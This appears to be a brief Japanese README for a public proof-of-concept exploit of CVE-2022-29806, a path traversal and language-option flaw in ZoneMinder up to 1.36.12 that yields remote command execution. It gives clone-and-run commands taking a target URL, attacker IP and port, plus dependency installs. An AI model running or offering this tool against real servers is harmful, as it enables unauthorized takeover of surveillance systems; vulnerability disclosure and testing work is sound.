
ZoneMinder 1.36.12 までの Language 権限昇格(および RCE)- PoC Exploit
ZoneMinder 1.36.12 までの言語特権昇格(および RCE)

ZoneMinder 1.36.13 より前および 1.37.11 より前のバージョンにおける、デバッグログファイルの Path Traversal とデフォルト言語オプションの脆弱性により、攻撃者は任意のコードを書き込み・実行してリモートコマンド実行を達成できます。
「この概念実証は ZoneMinder 1.36.4 ubuntu18.04 docker: ZoneMinder/zmdockerfiles に対してテストされましたが、最新バージョン 1.36.12 まで引き続き適用可能です。」
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
krastanoel がこの脆弱性を発見しました。